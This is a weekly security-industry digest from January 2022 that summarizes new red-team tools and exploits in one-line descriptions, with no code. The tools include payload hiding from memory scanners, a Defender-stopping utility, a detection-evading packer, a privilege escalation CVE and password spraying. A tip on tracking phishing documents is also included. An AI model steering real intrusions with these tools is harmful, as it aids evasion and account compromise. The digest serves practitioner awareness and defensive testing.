Last Week in Security (LWiS) - 2022-01-31

pkexec Linux LPE (@jogibharat), .NET remoting (@codewhitesec), usernames from CUCM (@n00py1), Notepad++ persistence (@_RastaMouse), Mythic update (@its_a_feature_), modern password spraying (@SprocketSec), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2022-01-25 to 2022-01-31.


Techniques and Write-ups

Tools and Exploits

  • stratus-red-team is "Atomic Red Team™" for the cloud, allowing to emulate offensive attack techniques in a granular and self-contained manner.
  • T.D.P. - Thread Description Poisoning uses SetThreadDescription and GetThreadDescription functions to hide the payload from memory scanners.
  • CVE-2022-21882 is the win32k LPE bypass CVE-2021-1732.
  • NimGetSyscallStub gets fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.
  • DefenderStop is a C# project to stop the defender service using via token impersonation.
  • PurplePanda fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.
  • NimPackt-v1 is a Nim-based packer for .NET (C#) executables and shellcode targeting Windows. It automatically wraps the payload in a Nim binary that is compiled to Native C and as such harder to detect and reverse engineer.
  • wholeaked. s a file-sharing tool that allows you to find the responsible person in case of a leakage. I could see this being useful for sending multiple copies of phishing documents and seeing which ones end up on Virus Total or similar sites.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • hobbits is a multi-platform GUI for bit-based analysis, processing, and visualization. This reminds me of the 010 Editor and its templates.
  • spraycharles a low and slow password spraying tool, designed to spray on an interval over a long period of time.
  • cent or Community edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place.
  • Frida HandBook is an amazing resource for all things binary instrumentation.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.